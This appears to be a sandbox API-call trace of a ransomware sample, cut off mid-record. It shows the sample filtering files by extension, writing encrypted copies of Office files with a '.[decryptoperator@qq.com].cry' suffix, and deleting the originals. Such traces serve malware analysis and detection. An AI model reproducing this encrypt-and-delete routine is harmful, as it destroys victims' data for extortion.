lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.030] lstrlenW (lpString=".zip") returned 4 [0056.030] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0056.030] lstrlenW (lpString=".rar") returned 4 [0056.030] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0056.030] lstrlenW (lpString=".bz2") returned 4 [0056.030] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0056.030] lstrlenW (lpString=".7z") returned 3 [0056.030] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0056.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.031] lstrlenW (lpString=".dbf") returned 4 [0056.031] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0056.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.031] lstrlenW (lpString=".1cd") returned 4 [0056.031] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0056.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.031] lstrlenW (lpString=".jpg") returned 4 [0056.031] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0056.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.031] lstrlenW (lpString=".doc") returned 4 [0056.031] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0056.031] lstrlenW (lpString=".docx") returned 5 [0056.031] lstrcmpiW (lpString1=".docx", lpString2="S.EXE") returned -1 [0056.031] lstrlenW (lpString=".pdf") returned 4 [0056.031] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0056.031] lstrlenW (lpString=".xls") returned 4 [0056.031] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0056.031] lstrlenW (lpString=".xlsx") returned 5 [0056.031] lstrcmpiW (lpString1=".xlsx", lpString2="S.EXE") returned -1 [0056.031] lstrlenW (lpString=".ppt") returned 4 [0056.031] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0056.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.031] lstrlenW (lpString=".zip") returned 4 [0056.031] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0056.031] lstrlenW (lpString=".rar") returned 4 [0056.031] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0056.031] lstrlenW (lpString=".bz2") returned 4 [0056.031] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0056.031] lstrlenW (lpString=".7z") returned 3 [0056.031] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0056.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.031] lstrlenW (lpString=".dbf") returned 4 [0056.031] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0056.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.031] lstrlenW (lpString=".1cd") returned 4 [0056.031] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0056.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.032] lstrlenW (lpString=".jpg") returned 4 [0056.032] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0056.032] lstrcmpiW (lpString1=".EXE", lpString2=".cry") returned 1 [0056.032] lstrlenW (lpString="MSOXMLED.EXE") returned 12 [0056.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0056.032] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=121168) returned 1 [0056.032] CloseHandle (hObject=0x1f4) returned 1 [0056.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe")) returned 0x20 [0056.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0056.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0056.033] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.033] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0056.033] GetLastError () returned 0x0 [0056.033] ReadFile (hFile=0x1f4, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0) Thread: id = 12 os_tid = 0x9f0 [0035.252] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x6c0960 [0035.253] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x6d0968 [0035.253] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6504b0 [0035.253] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x653210 [0035.253] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6504c8 [0035.253] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x3740020 [0035.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6504e0 [0035.254] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6504e0, Size=0x20) returned 0x67fd60 [0035.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6504e0 [0035.254] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6504e0, Size=0x20) returned 0x67fd88 [0035.254] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.254] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.254] Wow64DisableWow64FsRedirection (in: OldValue=0x2c5ff58 | out: OldValue=0x2c5ff58*=0x0) returned 1 [0035.254] lstrlenW (lpString="kernel32.dll") returned 12 [0035.254] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd60 | out: hHeap=0x600000) returned 1 [0035.254] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.254] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd88 | out: hHeap=0x600000) returned 1 [0035.254] Sleep (dwMilliseconds=0x64) [0035.449] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.449] lstrlenW (lpString="Setup.xml") returned 9 [0035.449] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0035.550] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2296) returned 1 [0035.550] CloseHandle (hObject=0x18c) returned 1 [0035.550] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.550] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.550] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0035.550] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.550] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.550] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.550] GetLastError () returned 0x0 [0035.550] ReadFile (in: hFile=0x18c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x8f8, lpOverlapped=0x0) returned 1 [0035.686] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x900, lpOverlapped=0x0) returned 1 [0035.687] ReadFile (in: hFile=0x18c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.687] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.687] SetEndOfFile (hFile=0x190) returned 1 [0035.687] CloseHandle (hObject=0x190) returned 1 [0035.687] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.687] SetEndOfFile (hFile=0x18c) returned 1 [0035.688] CloseHandle (hObject=0x18c) returned 1 [0035.688] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.688] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.689] lstrlenW (lpString=".doc") returned 4 [0035.689] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.689] lstrlenW (lpString=".docx") returned 5 [0035.689] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.689] lstrlenW (lpString=".pdf") returned 4 [0035.689] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.689] lstrlenW (lpString=".xls") returned 4 [0035.689] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.689] lstrlenW (lpString=".xlsx") returned 5 [0035.689] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.689] lstrlenW (lpString=".ppt") returned 4 [0035.689] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.689] lstrlenW (lpString=".zip") returned 4 [0035.689] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.689] lstrlenW (lpString=".rar") returned 4 [0035.689] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.689] lstrlenW (lpString=".bz2") returned 4 [0035.689] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.689] lstrlenW (lpString=".7z") returned 3 [0035.689] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.689] lstrlenW (lpString=".dbf") returned 4 [0035.689] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.689] lstrlenW (lpString=".1cd") returned 4 [0035.689] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.689] lstrlenW (lpString=".jpg") returned 4 [0035.689] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.690] lstrlenW (lpString=".doc") returned 4 [0035.690] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.690] lstrlenW (lpString=".docx") returned 5 [0035.690] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.690] lstrlenW (lpString=".pdf") returned 4 [0035.690] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.690] lstrlenW (lpString=".xls") returned 4 [0035.690] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.690] lstrlenW (lpString=".xlsx") returned 5 [0035.690] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.690] lstrlenW (lpString=".ppt") returned 4 [0035.690] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.690] lstrlenW (lpString=".zip") returned 4 [0035.690] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.690] lstrlenW (lpString=".rar") returned 4 [0035.690] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.690] lstrlenW (lpString=".bz2") returned 4 [0035.690] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.690] lstrlenW (lpString=".7z") returned 3 [0035.690] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.690] lstrlenW (lpString=".dbf") returned 4 [0035.690] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.690] lstrlenW (lpString=".1cd") returned 4 [0035.690] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.690] lstrlenW (lpString=".jpg") returned 4 [0035.690] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.690] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.690] lstrlenW (lpString="Setup.xml") returned 9 [0035.690] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0035.691] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2362) returned 1 [0035.691] CloseHandle (hObject=0x18c) returned 1 [0035.691] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.691] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.691] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0035.691] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.691] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.691] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.691] GetLastError () returned 0x0 [0035.691] ReadFile (in: hFile=0x18c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x93a, lpOverlapped=0x0) returned 1 [0035.820] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x940, lpOverlapped=0x0) returned 1 [0035.820] ReadFile (in: hFile=0x18c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.820] WriteFile (in: hFile=0x190, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.820] SetEndOfFile (hFile=0x190) returned 1 [0035.821] CloseHandle (hObject=0x190) returned 1 [0035.821] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.821] SetEndOfFile (hFile=0x18c) returned 1 [0035.822] CloseHandle (hObject=0x18c) returned 1 [0035.822] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.822] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.822] lstrlenW (lpString=".doc") returned 4 [0035.822] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.822] lstrlenW (lpString=".docx") returned 5 [0035.822] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.822] lstrlenW (lpString=".pdf") returned 4 [0035.822] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.822] lstrlenW (lpString=".xls") returned 4 [0035.822] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.822] lstrlenW (lpString=".xlsx") returned 5 [0035.822] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.823] lstrlenW (lpString=".ppt") returned 4 [0035.823] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.823] lstrlenW (lpString=".zip") returned 4 [0035.823] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.823] lstrlenW (lpString=".rar") returned 4 [0035.823] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString=".bz2") returned 4 [0035.823] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString=".7z") returned 3 [0035.823] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.823] lstrlenW (lpString=".dbf") returned 4 [0035.823] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.823] lstrlenW (lpString=".1cd") returned 4 [0035.823] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.823] lstrlenW (lpString=".jpg") returned 4 [0035.823] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.823] lstrlenW (lpString=".doc") returned 4 [0035.823] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString=".docx") returned 5 [0035.823] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.823] lstrlenW (lpString=".pdf") returned 4 [0035.823] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString=".xls") returned 4 [0035.823] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString=".xlsx") returned 5 [0035.823] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.823] lstrlenW (lpString=".ppt") returned 4 [0035.823] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.823] lstrlenW (lpString=".zip") returned 4 [0035.823] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.823] lstrlenW (lpString=".rar") returned 4 [0035.823] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.824] lstrlenW (lpString=".bz2") returned 4 [0035.824] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.824] lstrlenW (lpString=".7z") returned 3 [0035.824] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.824] lstrlenW (lpString=".dbf") returned 4 [0035.824] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.824] lstrlenW (lpString=".1cd") returned 4 [0035.824] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.824] lstrlenW (lpString=".jpg") returned 4 [0035.824] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.824] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.824] lstrlenW (lpString="VisioMUI.xml") returned 12 [0035.824] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.904] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=9503) returned 1 [0035.904] CloseHandle (hObject=0x19c) returned 1 [0035.904] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 0x2020 [0035.904] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all 